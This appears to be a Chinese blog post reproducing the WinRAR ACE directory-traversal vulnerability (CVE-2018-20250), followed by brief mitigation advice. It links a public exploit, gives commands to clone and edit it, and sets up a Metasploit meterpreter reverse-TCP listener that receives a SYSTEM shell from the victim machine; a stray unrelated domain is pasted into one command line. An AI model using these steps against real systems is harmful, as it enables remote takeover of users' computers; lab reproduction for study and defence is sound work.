溫馨提示×

溫馨提示×

您好，登錄后才能下訂單哦！

密碼登錄×

忘記密碼？

登錄注冊×

獲取短信驗證碼

其他方式登錄

點擊登錄注冊即表示同意《億速云用戶服務條款》

用戶登錄×

賬戶密碼登錄

請使用微信掃描上方二維碼

使用幫助

請求超時！

請點擊重新獲取二維碼

WinRAR目錄穿越漏洞

發布時間：2020-08-10 23:23:15 來源：ITPUB博客閱讀：173 作者：專注的阿熊欄目：網絡安全

該漏洞是由于WinRAR 所使用的一個陳舊的動態鏈接庫UNACEV2.dll所造成的，該動態鏈接庫在2006 年被編譯，沒有任何的基礎保護機制(ASLR,DEP 等)。該動態鏈接庫的作用是處理ACE 格式文件。而在解壓處理過程中存在一處目錄穿越漏洞,允許解壓過程寫入文件至開機啟動項，導致代碼執行

漏洞編號： CVE-2018-20250

影響版本：

WinRAR < 5.70 Beta 1

Bandizip < = 6.2.0.0

好壓(2345壓縮) < = 5.9.8.10907

360壓縮 < = 4.0.0.1170

WinRAR目錄穿越漏洞

復現環境

WinRAR目錄穿越漏洞

exp下載：

https://github.com/WyAtu/CVE-2018-20250/

WinRAR目錄穿越漏洞

復現過程

1.使用Metasploit生成Payload

WinRAR目錄穿越漏洞

WinRAR目錄穿越漏洞

2.使用exp生成惡意程序

cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py

將exp.py中的evil_filename = “calc.exe”改為”WinRAR.exe”

WinRAR目錄穿越漏洞

將CVE-2018-20250文件夾復制到Windows10中執行

WinRAR目錄穿越漏洞

3.在靶機上運行惡意程序

將test.rar 投放到win8上解壓運行

4.在kali上監聽metasploit

msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run www.gendan5.com

WinRAR目錄穿越漏洞

5.控制靶機

Win8重啟之后 kali會接受到會話此時執行shell

進入到win8系統的system權限

WinRAR目錄穿越漏洞

WinRAR目錄穿越漏洞

漏洞防御

1. 刪除受影響壓縮軟件目錄下UNACEV2.dll文件能有效防御

2. 升級到最新版本，WinRAR 目前版本是 5.70 Beta 1

3. 總而言之，該漏洞并沒有那么致命。目標性的打站，得先欺騙下載，并再在未防護的服務器上解壓，企業服務器管理員都很難會這樣做。而且必須得服務器重啟才能生效，不能直接執行腳本

向AI問一下細節

推薦閱讀：

免責聲明：本站發布的內容（圖片、視頻和文字）以原創、轉載和分享為主，文章觀點不代表本網站立場，如果涉及侵權請聯系站長郵箱：is@yisu.com進行舉報，并提供相關證據，一經查實，將立刻刪除涉嫌侵權內容。

上一篇新聞：
MySQL：count(*) count(字段) 實現上區別
下一篇新聞：
中年蘇寧負重前行

猜你喜歡

AI
助
手

產品服務

地區劃分

專題活動

幫助支持

關于我們

售后咨詢

7*24小時在線電話：400-100-2938

7*24小時在線 QQ：800811969

關注億速云

億速云公眾號

手機網站二維碼

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女